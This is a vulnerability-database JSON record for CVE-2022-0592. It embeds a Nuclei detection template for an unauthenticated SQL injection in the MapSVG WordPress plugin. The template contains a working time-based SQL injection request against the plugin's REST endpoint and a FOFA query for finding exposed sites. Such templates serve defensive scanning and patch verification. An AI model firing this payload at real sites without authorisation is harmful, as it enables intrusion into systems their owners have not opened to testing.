{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0592/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0592/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0592/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0592/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0592/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0592"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0592"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-0592.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-0592\n\ninfo:\n  name: MapSVG < 6.2.20 - Unauthenticated SQLi\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    The MapSVG WordPress plugin before 6.2.20 does not validate and escape a parameter via a REST endpoint before using it in a SQL statement, leading to a SQL Injection exploitable by unauthenticated users.\n  impact: |\n    Unauthenticated attackers can execute SQL injection via REST API endpoint to extract database contents or execute arbitrary commands, potentially compromising the entire WordPress database.\n  remediation: |\n    Upgrade to MapSVG version 6.2.20 or later.\n  reference:\n    - https://wpscan.com/vulnerability/5d8d53ad-dc88-4b50-a292-fc447484c27b/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0592\n    cwe-id: CWE-89\n    epss-score: 0.10431\n    epss-percentile: 0.95531\n    cpe: cpe:2.3:a:mapsvg:mapsvg:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: mapsvg\n    product: mapsvg\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/mapsvg/\"\n  tags: wpscan,cve,cve2022,mapsvg,wordpress,wp,wp-plugin,sqli,time-based-sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 6'\n          - 'contains(body, \"map\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100e1b6bcaaba38872e5cfcf5d5fec181e3ad15bb6fe1528374f527967ac2e46d14022100e5cccfe5837c049f5e79748fac93de9db687be4d9bf165e2bdb524abf806e030:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-0592"
}